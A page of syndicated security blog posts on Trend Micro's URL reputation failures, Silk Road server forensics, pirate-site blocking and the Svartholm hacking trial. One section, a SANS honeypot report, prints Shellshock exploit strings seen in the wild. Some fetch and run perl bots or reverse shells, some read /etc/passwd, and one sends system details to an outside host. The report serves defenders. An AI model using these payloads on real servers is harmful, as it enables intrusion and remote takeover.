I tried to report these issues to Trend Micro. Back in 2012, I had a short email exchange with them that focused on the porn uploads. (The reply basically disregarded the concern.) Later, in 2013, I provided more detail about the proxy abuses to a Trend Micro employee during a trip to California. But nothing was ever done about it.

After-the-Fact Scanning

One of the biggest issues that I have with Trend Micro’s reputation system is the order of events.

In my logs, I can see a user visiting a unique URL recorded in my logs. Shortly after the visit, Trend Micro visits the same URL. This means that the user was allowed to visit the site before the reputation was checked. If the site happens to be hostile or contains undesirable content, then the user would be alerted after the fact. If the site hosts malware, then you’re infected long before Trend Micro would alert you of the risk.

To put it bluntly: if Trend Micro is going to be warning users based on a site’s reputation, then shouldn’t the warning come before the user is granted access to the site?

Quality of Reporting

Trend Micro permits users to submit URLs and see the site’s reputation. I decided to spot-check their system. I submitted some friendly sites, some known to be hostile, and some that host adult content… Here are some of the results:

  • Trend Micro: “Safe.”

  • Symantec: “Safe.”
  • Google: “Safe.”
  • Craigslist: “Safe.” Really? Craigslist? Perhaps they didn’t scan some of the escort listings. I gave it the URL to Craigslist “Washington, DC personals”. (I had searched Google for ‘craigslist escorts’ and this was the first result. Thanks DC!) This URL is anything but family friendly. There are subjects like “Sub Bottom Seeking Top/Master for Use and Domination” and “Sunday Closeted Discreet Afternoon Delight”. The Trend Micro result? “Safe”. They classified it as “Shopping” and not adult content.
  • Super T[redacted] (a known porn site). Trend Micro said “Safe” but classified it as “Pornography”. This is a great result and gives me hope for Trend Micro’s system.
  • Singapore Girls. “Safe” and “Adult / Mature Content”. Most other services classify this as a porn site. I wonder where they draw the line between pornography and mature content…
  • Backpage: “Safe, Newsgroups, Shopping, Travel”. I then uploaded the link to their escorts page, which has some explicit nudity and lots of adult content. The result? Safe, Newsgroups, Shopping, Travel. Not even an “18″, “Adult”, or “Mature Content” rating.
  • “Safe, Sports”. I’ll agree with this. It’s a forum for bicycle enthusiasts.
  • 4chan: “Dangerous, Disease Vector”. According to Trend Micro, “Dangerous” means the site hosts malware or phishing. 4chan is not a phishing site, and I have never seen malware hosted at 4chan. While 4chan users may not be friendly, the site does not host malware. This strikes me as a gross misclassification. It should probably be “Safe, 18+, Adult Content, Social Network”.
  • >_: One of 4chan’s channels goes by the name “/b/”. If you see someone talking about “/b/”, then you know they are talking about 4chan’s random topics channel. Outside of 4chan, other forums have their own symbolic names. If you don’t know the site represented by “&gt_”, then that’s your problem — I’m not going to list the name here. This is a German picture sharing site that has more porn than 4chan. While 4chan has some channels that are close to family friendly, the >_ site is totally not safe for work. Trend Micro says “Safe, Blog/Web Communications”. They say nothing about adult content; if Trend Micro thinks 4chan is “dangerous”, then >_ should be at least as dangerous.

With Filename Ballistics, I have been able to map out a lot of sites that use custom filename formats. A side effect is that I know which sites host mostly family friendly content, and which do not. I submitted enough URLs to Trend Micro’s reputation system that they began to prompt me with a captcha to make sure I’m human. The good news is that they knew most of the sites. The bad news is that they missed a lot of the sites that host adult content and malware.

For a comparison, I tested a few of these sites against McAfee’s SiteAdvisor. McAffee actually scanned FotoForensics and reported “This link is safe. We tested it and didn’t find any significant security issues.” They classified it as “Media Sharing”. (I’ll agree with that.) McAfee also reports that 4chan is suspicious and a “parked domain” (WTF?), they reported that >_ wasn’t tested, Craigslist is a safe (no malware) site with “Forum/Bulletin Boards”, and Singapore Girls is “Safe: Provocative Attire”.

Other Lookup Tools

Trend Micro also has an IP address reputation tool. This is supposed to be used to identify whether an address is associated with known spammers, malware, or other online attacks.

At FotoForensics, I’ve been actively detecting, and in some cases blocking, hostile network addresses. I use a combination of a custom intrusion detection system and known DNS Blacklist services. This has dramatically cut down on the number of attacks and other abuses against my site.

I uploaded a couple of network addresses to Trend Micro in order to see how they assigned reputations:

  • The Honeynet Project reports “Suspicious behavior, Comment spammer”. reports “Service abuse (spam, web attacks)”. My own system identified this as a TOR node. Trend Micro reports: “Unlisted in the spam sender list”.

  • This is another Suspicious behavior, Comment spammer, TOR node. Trend Micro fails to identify it.
  • Honeynet Project says “Search engine, Link crawler”. My system identifies it as Googlebot. Trend Micro says “Unlisted in the spam sender list”. This looks like their generic message for “not in any of our databases”.

    Keep in mind, tracking TOR nodes is really easy. If you run a TOR client, then your client automatically downloads the TOR node list. For me, I just start up a client, download the list, and kill the client without ever using TOR. This gives me a large list of TOR nodes and I can just focus on the exit nodes.

    At minimum, every TOR node should be associated with “Suspicious behavior”. This is not because users using TOR are suspicious. Rather, it is because there are too many attackers who use TOR for anonymity. As a hosting site, I don’t know who is coming from TOR and the odds of it being an attacker or spammer are very high compared to non-TOR users.

  • This system actively attacked my site. Trend Micro reports “Bad: DUL”. As they define it, “the Dynamic User List (DUL) includes IP addresses in dynamic ranges identified by ISPs. Most legitimate mail sources have static IP addresses.”

    A Dynamic User List (aka Dialup User List), contains known subnets that are dynamically assigned by ISPs to their customers. These lists are highly controversial. On one hand, they force ISPs to regulate all email and take responsibility for reducing spam. On the other hand, this approach ends up blacklisting a quarter in the Internet. In effect, users must send email through their ISP’s system and users are treated as spammers before ever sending an email.

    If this sounds like the Net Neutrality debate, then you’re right — it is. Net neutrality means that ISPs cannot filter spam; all packets are equal, including spam. Without neutrality, ISPs are forced to help mitigate spam.

    The good news is, Trend Micro noticed that this was an untrustworthy address. The bad news is that they classified it because it was a dynamic address and not because they actually noticed it doing anything hostile.

  • This system scanned my site for vulnerabilities. The Honeynet Project says “Suspicious behavior, Comment spammer”. reports “Service abuse (spam, web attacks)”. Trend Micro? “Unlisted in the spam sender list”.

Alright… so maybe Trend Micro is only looking for spammers… Let’s submit some IP addresses from spam that I recently received.

  • Other systems report: Suspicious behavior, Comment spammer, Known proxy, Service abuse (spam, web attacks), Network attack. Trend Micro reports “Bad: DUL”. Again, Trend Micro flagged it because it is a dynamic address and not because they noticed it doing anything bad.

  • None of the services, including Trend Micro, identify it. As far as I can tell, anything from is spam. This range currently accounts for a solid 30% of all spam to my own honeypot addresses.
  • The blacklist services that I use found nothing. JP SURBL identifies it as a spammer’s address. Trend Micro reports it as “Bad: QIL”. According to them, the Quick IP Lookup Database (QIL) stores known addresses used by botnets.

    Botnets typically consist of a wide range of compromised computers that work together as a unit. If you map botnet nodes to geolocations, you will usually see them all over and not limited to a specific subnet. In contrast to botnets, many spammers acquire large sequential ranges of network addresses (subnets) from unsuspecting (or uncaring) hosting sites. They use the addresses for spending spam. While these spam systems may be remotely controlled, the tight cluster is usually not managed like a botnet.

    According to my own spam collection, this specific address is part of spam network that spans multiple subnets ( – and Each subnet runs a different mailing campaign and they are constantly sending spam. This same spammer recently added another subnet:, which includes the previous address.

    This spammer has been active for months, and Trend Micro flags it. However, they identify it as “Bad: QIL”. As far as I can tell, this address is not part of a botnet (as identified by QIL). Instead, this spammer signs up with various hosting sites and spams like crazy until getting booted out.

  • Most services, including Trend Micro, missed this. Barracuda Central was the only one to identify this as a spammer.
  • This spammer is listed in the blacklist, but Trend Micro does not identify it.
  • I caught this address searching my site for email addresses and sending me spam. It is both a harvester and a spammer. This network address is listed in 7 different spam blacklists. Trend Micro reports it as a botnet (Bad: QIL), but it’s actually part of a sequential set of network addresses (a subnet) used by a spammer.
  • This address is detected by, but not Trend Micro.

I certainly cannot fault Trend Micro for failing to identify most of the addresses used for spam. Of the 27 public spam blacklists and the three other blacklists that I checked, all of them had high false-negative rates and failed to associate most addresses with spam. Every blacklist seems to have their own tiny, independent set of addresses and there is little overlap. However, Trend Micro’s subset seems to be significantly smaller than other blacklists. The best ones based on my own testing are and

In general, Trend Micro seems correct about the addresses that it flags as hostile — as long as you ignore the cause. Unfortunately, Trend Micro doesn’t know many addresses. You should expect a high false-positive rate due to generic inclusions, and a high false-negative rate (Type-II error) due to their small database. Moreover, many of their matches appear to be caught by generic rules that classify large swaths of addresses as hostile without any proof, rather than any actual detection. This means Trend Micro has a high degree of Type-III errors: correct by coincidence. Finally, Trend Micro seems to classify any network of spam systems as a “botnet”, even when they are not botnets.

About Trend Micro

Trend Micro offers many products. Their anti-virus software is as good as any. But that’s not saying much. As Trend Micro’s CEO Eva Chen said in 2008, “I’ve been feeling that the anti-virus industry sucks. If you have 5.5 million new viruses out there how can you claim this industry is doing the right job?”

Virtually the entire AV industry is reactive. First they detect an outbreak, then then evaluate the problem and create a detector. This means that the attackers always have the advantage: they can create new malware faster than the AV companies can detect and react. The move toward a reputation-based system as a predictor is a good preventative approach.

Unfortunately, Trend Micro seems to have seriously dropped the ball. Their system lies about whether a site has been checked and they validate the site after the user has accessed it. They usually report incorrect information, and when they are right, it seems due more to coincidence than accuracy.

I do believe that a profiling system integrated with a real-time detector is a great proactive alternative. However, Trend Micro’s offerings lack the necessary accuracy, dependability, and reputation. As I reflect on Eva Chen’s statement, I can only conclude one thing: it’s been six years, and they still suck.

TorrentFreak: Court Orders Immediate Pirate Site Blockade

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak, at the time one of the world’s largest illegal streaming portals, was shut down in 2011 as part of Europe’s largest ever action against piracy sites.

However, just a month before was dismantled, Austrian ISP ‘UPC’ was served with a preliminary injunction ordering it to block subscriber access to the site. The order had been obtained by the Hollywood-affiliated anti-piracy group VAP but it was called into doubt by the ISP. This led to the Austrian Supreme Court referring the matter to the European Court of Justice.

Earlier this year the ECJ handed down its widely publicized decision which stated that yes, in reasonable circumstances, pirate sites can indeed be blocked by European ISPs.

On the back of this ruling, VAP subsequently wrote to several local ISPs (UPC, 3, Tele2 and A1) demanding blockades of and, a site that took over from This would become the test case on which all future blockades would be built.

When this formal request for the ISPs to block the sites was rejected, in August VAP sued the providers. And now, after more than three years of wrangling, VAP have finally got their way.

In a ruling handed down yesterday by the Commercial Court of Vienna, UPC, 3, Tele2 and A1 were ordered to block Movie4K and Kinox with immediate effect. According to Der Standard, UPC and A1 placed blocks on the sites within hours, with 3 and Tele2 expected to comply with the injunction today.

But while another important hurdle has now been overcome, there is some way to go before VAP will have achieved everything they initially set out to do. At issue now is how far the ISPs will have to go in order to comply with the court order. It’s understood that VAP requires DNS and IP address blocking at a minimum, but whether the ISPs intend to comply with that standard remains to be seen.

It’s important for VAP, and other anti-piracy groups waiting in the wings, that these technical steps are workable going forward. Both VAP and the IFPI have lists of sites they would like blocked in the same way as Movie4K and Kinox have been, so it’s crucial to them that blockades aren’t easily circumvented.

Once this issue has been dealt with, in the next few months it’s likely that attention will turn to legal action being planned by the IFPI. The recording group has taken on the task of having torrent sites blocked in Austria, starting off with The Pirate Bay,, and

IFPI is expected to sue several ISPs in the hope that local courts will treat torrent sites in the same way as they have streaming services. Once that’s been achieved – and at this stage it seems likely – expect long lists of additional domains to be submitted to the courts.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: Reading the Silk Road configuration

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Many of us believe it wasn’t the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using “parallel construction”, meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn’t true.

Today, Brian Krebs released data from the defense team that seems to confirm the “parallel construction” theory. I thought I’d write up a technical discussion of what was found.

The Tarbell declaration

A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server (“the Tarbell declaration“). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the “packet headers”.

Thirdly, his saved none of the forensics data. You’d have thought that had this been real, he would have at least captured packet logs or even screenshots of what he did. I’m a technical blogger. I document this sort of thing all the time. It’s not hard for me, it shouldn’t be hard for the FBI when it’s the cornerstone of the entire case.

Lastly, Tarbell doesn’t even deny it was parallel construction. A scenario of an NSA agent showing up at the FBI offices and opening a browser to the IP address fits within his description of events.

I am a foremost Internet expert on this sort of thing. I think Christopher Tarbell is lying.

The two servers involved

There were two serves involved.

The actual Tor “onion” server ran on a server in Germany at the IP address This was the front-end server.

The Silk Road data was held on a back-end server in Iceland at the IP address This is the server Tarbell claims to have found.

The data dumped today on Brian Krebs’ site is configuration and log files from the second server.

The Icelandic configuration

The Icelandic backend had two “sites”, one on HTTP (port 80) running the phpmyadmin pages, and a second on HTTPS (port 443) for communicating the Silk Road content to the German onion server.

The HTTP (port 80) configuration is shown below. Because this requires “basic authentication”, Tarbell could not have accessed the server on this port.

However, the thing to note about this configuration is that “basic” authentication was used over port 80. If the NSA were monitoring links to/from Iceland, they could easily have discovered the password and used it to log onto the server. This is basic cybersecurity, what the “Wall of Sheep” at DefCon is all about.

The following picture shows the configuration of the HTTPS site.

Notice firstly that the “listen 443″ specifies only a port number and not an IP address. Consequently, anybody on the Internet could connect to the server and obtain its SSL certificate, even if it cannot get anything but an error message from the web server. Brian Krebs quotes Nicholas Weaver as claiming “This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server”. This is wrong, the web server accept all TCP connections, though it may give a “403 forbidden” as the result.

BTW: one plausible way of having discovered the server is to scan the entire Internet for SSL certificates, then correlate information in those certificates with the information found going across the Tor onion connection.

Next is the location information that allows only localhost, the German server, and then denies everything else (“deny all”). As mentioned above, this doesn’t prevent the TCP connection, but does produce a “403 forbidden” error code.

However, there is a flaw: this configuration is overridden for PHP files in the next section down. I’ve tested this on my own server. While non-PHP files are not accessible on the server, anything with the .php file extension still runs for everyone.

Worse yet, the login screen uses “/index.php”. The rules above convert an access of “/” automatically to “/index.php”. If indeed the server has the file “/var/www/market/public/index.php”, then Tarbell’s explanation starts to make sense. He’s still missing important details, and of course, there is no log of him having accessed the server this way,, but this demonstrates that something like his description isn’t impossible. One way this could have been found is by scanning the entire Internet for SSL servers, then searching for the string “Silkroad” in the resulting webpage.

The log files

The FBI imaged the server, including all the log files. Typical log entries looked like the following: – - [14/Jul/2013:06:55:33 +0000] “GET /orders/cart HTTP/1.0″ 200 49072 “http://silkroadvb5piz3r.onion/silkroad/item/0f81d52be7″ “Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0″

Since the defense could not find in the logfiles where Tarbell had access the system, the prosecutors helped them out by pointing to entries that looked like the following: – - [11/Jun/2013:16:58:36 +0000] “GET / HTTP/1.1″ 200 2616 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″ – - [11/Jun/2013:16:58:36 +0000] “GET
/phpmyadmin.css.phpserver=1&lang=en&collation_connection=utf8_general_ci&token=451ca1a827cda1c8e80d0c0876e29ecc&js_frame=right&nocache=3988383895 HTTP/1.1″ 200 41724 “” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″

However, these entries are wrong. First, they are for the phpmyadmin pages and not the Silk Road login pages, so they are clearly not the pages described in the Tarbell declaration. Second, they return “200 ok” as the error code instead of a “401 unauthorized” login error as one would expect from the configuration. This means either the FBI knew the password, or the configuration has changed in the meantime, or something else is wrong with the evidence provided by the prosecutors.


As an expert in such topics as sniffing passwords and masscaning the Internet, I know that tracking down the Silk Road site is well within the NSA’s capabilities. Looking at the configuration files, I can attest to the fact that the Dread Pirate Roberts sucked at op-sec.

As an expert, I know the Tarbell declaration is gibberish. As an expert reading the configuration and logs, I know that it doesn’t match the Tarbell declaration. That’s not to say that the Tarbell declaration has been disproven, it’s just that “parallel construction” is a better explanation for what’s going on than Tarbell actually having found the Silk Road server on his own.

Krebs on Security: Silk Road Lawyers Poke Holes in FBI’s Story

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do.

The login prompt and CAPTCHA from the Silk Road home page.

The login prompt and CAPTCHA from the Silk Road home page.

Prior to its disconnection last year, the Silk Road was reachable only via Tor, software that protects users’ anonymity by bouncing their traffic between different servers and encrypting the traffic at every step of the way. Tor also lets anyone run a Web server without revealing the server’s true Internet address to the site’s users, and this was the very technology that the Silk road used to obscure its location.

Last month, the U.S. government released court records claiming that FBI investigators were able to divine the location of the hidden Silk Road servers because the community’s login page employed an anti-abuse CAPTCHA service that pulled content from the open Internet — thus leaking the site’s true Internet address.

But lawyers for alleged Silk Road captain Ross W. Ulbricht (a.k.a. the “Dread Pirate Roberts”) asked the court to compel prosecutors to prove their version of events.  And indeed, discovery documents reluctantly released by the government this week appear to poke serious holes in the FBI’s story.

For starters, the defense asked the government for the name of the software that FBI agents used to record evidence of the CAPTCHA traffic that allegedly leaked from the Silk Road servers. The government essentially responded (PDF) that it could not comply with that request because the FBI maintained no records of its own access, meaning that the only record of their activity is in the logs of the seized Silk Road servers.

The response that holds perhaps the most potential to damage the government’s claim comes in the form of a configuration file (PDF) taken from the seized servers. Nicholas Weaver,a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, explains the potential significance:

“The IP address listed in that file — — was the front-end server for the Silk Road,” Weaver said. “Apparently, Ulbricht had this split architecture, where the initial communication through Tor went to the front-end server, which in turn just did a normal fetch to the back-end server. It’s not clear why he set it up this way, but the document the government released in 70-6.pdf shows the rules for serving the Silk Road Web pages, and those rules are that all content – including the login CAPTCHA – gets served to the front end server but to nobody else. This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server.”

Translation: Those rules mean that the Silk Road server would deny any request from the Internet that wasn’t coming from the front-end server, and that includes the CAPTCHA.

“This configuration file was last modified on June 6, so on June 11 — when the FBI said they [saw this leaky CAPTCHA] activity — the FBI could not have seen the CAPTCHA by connecting to the server while not using Tor,” Weaver said. “You simply would not have been able to get the CAPTCHA that way, because the server would refuse all requests.”

The FBI claims that it found the Silk Road server by examining plain text Internet traffic to and from the Silk Road CAPTCHA, and that it visited the address using a regular browser and received the CAPTCHA page. But Weaver says the traffic logs from the Silk Road server (PDF) that also were released by the government this week tell a different story.

“The server logs which the FBI provides as evidence show that, no, what happened is the FBI didn’t see a leakage coming from that IP,” he said. “What happened is they contacted that IP directly and got a PHPMyAdmin configuration page.” See this PDF file for a look at that PHPMyAdmin page. Here is the PHPMyAdmin server configuration.

But this is hardly a satisfying answer to how the FBI investigators located the Silk Road servers. After all, if the FBI investigators contacted the PHPMyAdmin page directly, how did they know to do that in the first place?

“That’s still the $64,000 question,” Weaver said. “So both the CAPTCHA couldn’t leak in that configuration, and the IP the government visited wasn’t providing the CAPTCHA, but instead a PHPMyAdmin interface. Thus, the leaky CAPTCHA story is full of holes.”

Many in the Internet community have officially called baloney [that's a technical term] on the government’s claims, and these latest apparently contradictory revelations from the government are likely to fuel speculation that the government is trying to explain away some not-so-by-the-book investigative methods.

“I find it surprising that when given the chance to provide a cogent, on-the record explanation for how they discovered the server, they instead produced a statement that has been shown inconsistent with reality, and that they knew would be inconsistent with reality,” Weaver said. “”Let me tell you, those tin foil hats are looking more and more fashionable each day.”

SANS Internet Storm Center, InfoCON: yellow: Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a;
() { :;}; echo ‘Shellshock: Vulnerable’
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co
ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn’t escape special characters correctly, so this exploit would fail in this case. The page at appears to only return an “empty page” message.

) { :;}; /bin/bash -c x22wget -U BashNslash.×22


2 – Bots using the shellshock vulnerability:

This one installs a simple perl bot. Connects to port 6667 channel #bug

() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0 ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http
:// ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;” “() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:
// ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;

3 – Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv: Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 – Using Multiple headers to install perl reverse shell (shell connects to port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/; /usr/bin/perl /tmp/
Referer:() { :; }; /usr/bin/curl -o /tmp/; /usr/bin/perl /tmp/

5 – Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- -U=”$(uname -a)”
Cookie: () { :; }; wget -qO- -U=”$(uname -a)” 

6 – User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c “wget -O /var/tmp/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*



Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Gottfrid Svartholm Trial: IT Experts Give Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice continued this week in Copenhagen, Denmark. While Gottfrid is well known as a founder of The Pirate Bay, his co-defendant’s identity is still being kept out of the media.

In what’s being described as the largest case of its kind ever seen in the Scandinavian country, both stand accused of hacking computer mainframes operated by US IT giant CSC. This week various IT experts have been taking the stand.

On Tuesday, IT investigator Flemming Grønnemose appeared for the third time and stated that during the summer and fall of 2012, Swedish police had tipped off Danish police about possible hacker attacks against CSC.

According to, as part of Grønnemose’s questioning Gottfrid’s lawyer Luise Høj raised concerns over a number of changes that had taken place on her client’s computer since it had been taken into police custody.

Grønnemose admitted that when police installed programs of their own onto the device, security holes which could have been exploited for remote control access could have been closed. However, it appears police also have an exact copy of the machine in an unmodified state.

Further evidence centered around the IP addresses that were traced during the attacks. IP addresses from several countries were utilized by the attackers including those in Cambodia, Germany, Iran, Spain and the United States. German police apparently investigated the local IP address and found that it belonged to a hacked server in a hosting facility.

The server had not been rented out for long, but was still on and had been taken over by hackers, Grønnemose said. According to the prosecution, the same server also featured in last year’s Logica case in Sweden. Gottfrid was found guilty in that case and sentenced to two years in jail.

Another IT expert called to give evidence on the same day was Allan Lund Hansen who had examined the files found on Gottfrid’s computer. Those files, garnered from the CSC hack, contained thousands of names, addresses and social security numbers of Danish citizens. Since the files were in an encrypted folder along with data from earlier attacks on IT company Logica and the Nordea bank, the prosecution are linking the files to Gottfrid.

On Thursday, reported that the debate over Gottfrid’s computer being remotely controlled continued. Previously Jacob Appelbaum argued that an outside attacker could have used the machine to carry out the attacks but defense experts from the Center for Cyber ​​Security disputed that.

This week Thomas Krismar from the Center said that Python scripts found on Gottfrid’s computer were able to carry out automated tasks but in this case remote control was unlikely to be one of them.

“There are two characteristics we always look for when we try to discover remote control features. The first is one that starts automatically when you turn on your computer since the attacker will always try to maintain their footing on the computer. The second is one that ‘phones home’ to indicate that it is ready to receive commands,” Krismar said.

The script in question on Gottfrid’s machine needed to be started manually and did not attempt to make contact with anything on the web, the expert said.

Also appearing Thursday were further witnesses including Joachim Persson of Stockholm police who investigated Gottfrid’s computers after his arrest in Cambodia.

Persson said he found a tool known as Hercules, a sophisticated piece of software that emulates the kind of systems that were hacked at CSC. Persson did note, however, that such tools have legitimate uses for those learning how to operate similar systems.

The trial continues.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Works Like a Charm

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As a software developer, one of my core philosophies is to automate common tasks. If you have to do something more than once, then it is better to automate it.

Of course, there always is that trade-off between the time to automate and the time saved. If a two-minute task takes 20 hours to automate, then it’s probably faster (and a better use of your time) to do it manually when needed. However, if you need to do it hundreds of times, then it’s better to spend 20 hours automating it.

Sometimes you may not even realize how often you do a task. All of those minutes may not seem like much, but they can really add up.

Work Harder, Not Smarter

FotoForensics is currently receiving over 1,000 unique pictures per day. We’re at the point where we can either (A) hire more administrators, or (B) simplify existing administrative duties.

Recently I’ve been taking a closer look at some of the tasks we manually perform. Things like categorizing content for various research projects, identifying trends, scanning content for “new” features that run the gambit from new devices to new attacks, reviewing flagged content, and responding to user requests. A lot of these tasks are time consuming and performed more than once. And a few of them can be automated.

Network abuses come in many different forms. Users may upload prohibited content, automate submissions, attack the site with port scans and vulnerability tests, or submit comment-spam to our contact form. It’s always a good idea to check abusers against known blacklists. This tells me whether it is a wide-spread abuse or if my site is just special.

There are a bunch of servers that run DNS-based blacklists. They all work in similar ways:

  1. You encode the query as a hostname. Like “”. This encodes the IP address in reverse-notation:
  2. You perform a DNS hostname lookup.
  3. The DNS result encodes the response as an IP address. Different DNSBL servers have different encoded values, but they typically report suspicious behavior, known proxies, and spammer.

Some DNSBL servers seem too focused for my use. For example, if they only report known-spam systems and not proxies or malware, then it will rarely find a match for my non-spam queries. Other DNSBL systems seem to have dated content, with lists of proxies that have not been active for years. (One system will quickly add proxies but won’t remove them without a request. So dead proxies remain listed indefinitely.)

Most DNSBL servers focus on anti-spam. They report whether the address was used to send spam, harvest addresses, or other related actions. Ideally, I’d like a DNSBL that focuses on other hostile activities: network scanners, attackers, and proxies. But for now, looking for other abuses, like harvesters and comment-spam, is good enough.

Anonymous Proxies
I believe that anonymous proxies are important. They permit whistle-blowers to make anonymous reports and allow people to discuss personal issues without the fear of direct retribution. Groups like “Alcoholics Anonymous” would not be as successful if members had to be fully outed.

Unfortunately, anonymity also permits abuses. The new automated system downloads the list of TOR nodes daily. This allows us to easily check if a ban is tied to a TOR node. We don’t ban every TOR node. Instead, we only ban the nodes used for uploading prohibited content to the site.

For beginner TOR users, this may not make sense. Banning one node won’t stop the problem since the user will just change nodes. Except… Not all TOR nodes are equal. Nodes that can handle a higher load are given a higher weight and are more likely to carry traffic. We’ve only banned about 300 of the 6,100 TOR nodes, but that seems to have stopped most abuses from TOR. (And best yet: only about a dozen of these bans were manually performed — most were caught by our auto-ban system.)

Automating History
The newly automated system also scans the logs for own ban records and any actions made after being banned. I can tell if the network address is associated with network attacks or if the user just uploaded prohibited content. I can also tell if the user attempted to avoid the ban.

I recently had one person request a ban-removal. He claimed that he didn’t know why he was banned. After looking at the automated history report, I decided to leave the ban in place and not respond to him. But I was very tempted to write something like: “Dude… You were banned three seconds after you uploaded that picture. You saw the ban message that said to read the FAQ, and you read it twelve seconds later. Then you reloaded eight times, switched browsers, switched computers, and then tried to avoid the ban by changing your network address. And now you’re claiming that you don’t know why you were banned? Yeah, you’re still banned.”

Performing a full history search though the logs for information related to a ban used to take minutes. Now it takes one click.

NCMEC Reports
The word forensics means “relating to the use of scientific knowledge or methods in solving crimes” or “relating to, used in, or suitable to a court of law”. When you see a forensic system, you know it is geared toward crime detection and legal issues.

And people who deal in child exploitation photos know that their photos are illegal. Yet, some people are stupid enough to upload illegal pictures to FotoForensics.

The laws regarding these pictures are very explicit: we must report pictures related to child abuse and exploitation to the CyberTipline at the National Center for Missing and Exploited Children (NCMEC).

While I don’t mind the reporting requirement, I don’t like the report form. The current online form has dozens of fields and takes me more than 6 minutes to complete each time I need to submit a report. I need to gather the picture(s), information about the submitter, and other related log information. Some reports have a lot of files to attach, so they can take 12 minutes or more to complete. The total time I’ve spent using this form in the last year can be measured in days.

I’ve finally had enough of the manual submission process. I just spent a few days automating it from my side. It’s a PHP script that automatically logs in (for the session tokens), grabs the form (for the fields and any pre-populated values), fills out the data, attaches files, and submits it. It also automatically writes a short report (that I can edit with more information), records the confirmation information, and archives the stuff I am legally required to retain.

Instead of taking me 6+ minutes for each report, it now takes about 3 seconds. This simplifies the entire reporting process and significantly reduces the ick-factor.

Will Work for Work

A week of programming effort (spread over three weeks) has allowed me to reduce the overhead. Administrative tasks that would take a few hours each day now take minutes.

There’s still a good number of tasks that can be automated. This includes spotting certain types of pictures that are currently being included in specific research projects, and some automated classification. I can probably add in a little more automated NCMEC reporting, for those common cases where there is no need for a manually confirmation.

Eventually I will need to get a more powerful server and maybe bring on more help. But for right now, simply automating common tasks makes the current server very manageable.

